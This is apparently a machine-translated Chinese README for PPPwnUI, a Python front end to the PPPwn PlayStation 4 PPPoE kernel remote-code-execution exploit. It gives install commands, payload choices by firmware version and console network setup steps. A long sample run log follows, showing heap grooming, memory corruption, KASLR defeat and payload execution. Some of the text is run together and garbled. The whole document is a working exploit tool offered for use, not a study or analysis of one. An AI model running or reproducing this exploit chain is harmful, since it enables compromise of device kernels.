PPPwn用户界面
PPPwnUI Release 4.1
PPPwnUI 是一个用 Python 编写的程序,它向 TheFlow 创建的 PPPwn 漏洞添加了一个 UI。
git clone https://github.com/B-Dem/PPPwnUIpip install -r requirements.txt启动应用程序
窗户:
PPPwnUI.bat
Linux:
chmod +x PPPwnUI.sh然后 :
./PPPwnUI.sh使用下拉菜单选择您的界面
选择您要使用的漏洞利用版本(PPPwn Python、PPPwn_Go)
选择您的有效负载:
PPPwn :(适用于:7.00、7.01、7.02、7.50、7.51、7.55、8.00、8.01、8.03、8.50、8.52、9.00、9.03、9.04、9.50、9.51、9.60、 10.00、10.01、10.50、10.70、10.71 和 11.00)
PPPwn Goldhen有效负载:(适用于:9.00、9.60、10.00、10.01 和 11.00)
VTX 母鸡:(适用于:7.55、8.00、8.03、8.50、8.52、9.00、9.03、9.04、10.00、10.01 10.50、10.70、10.71 和 11.00)
PPPwn Linux 有效负载:(适用于:11.00)
自定义有效负载:(您自己的自定义有效负载)
然后单击“Start PPPwn”以启动漏洞利用。
在你的 PS4 上:
Settings ,然后转到NetworkSet Up Internet connection并选择Use a LAN CableCustom设置并选择PPPoE作为IP Address SettingsPPPoE User ID和PPPoE PaswordDNS Settings和MTU Settings选择AutomaticDo Not Use用于Proxy ServerTest Internet Connection以与您的计算机进行通信如果漏洞利用失败或 PS4 崩溃,您可以跳过互联网设置,只需单击Test Internet Connection即可。如果脚本失败或卡住等待请求/响应,请中止它并在您的计算机上再次运行它,然后单击 PS4 上的Test Internet Connection 。
在您的计算机上:
goldhen.bin复制到 exfat/fat32 USB 的根目录并将其插入 PS4。 [+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin
[+] Using PPPwnUI By Memz !
[+] STAGE 0: Initialization
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[ * ] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[ * ] Sending malicious LCP configure request...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141
[+] STAGE 2: KASLR defeat
[ * ] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000
[+] STAGE 3: Remote code execution
[ * ] Sending LCP terminate request...
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Triggering code execution...
[ * ] Waiting for stage1 to resume...
[ * ] Sending PADT...
[ * ] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[ * ] Sending PADO...
[ * ] Waiting for PADR...
[ * ] Sending PADS...
[ * ] Waiting for LCP configure request...
[ * ] Sending LCP configure ACK...
[ * ] Sending LCP configure request...
[ * ] Waiting for LCP configure ACK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure NAK...
[ * ] Waiting for IPCP configure request...
[ * ] Sending IPCP configure ACK...
[ * ] Sending IPCP configure request...
[ * ] Waiting for IPCP configure ACK...
[+] STAGE 4: Arbitrary payload execution
[ * ] Sending stage2 payload...
[+] Done ! 这个程序最初是由 Memz 为 Sighya 与 ❤️ 制作的。
如果您发现该程序有帮助,请在存储库上留下一颗星!
如果您有任何反馈,请提出问题!
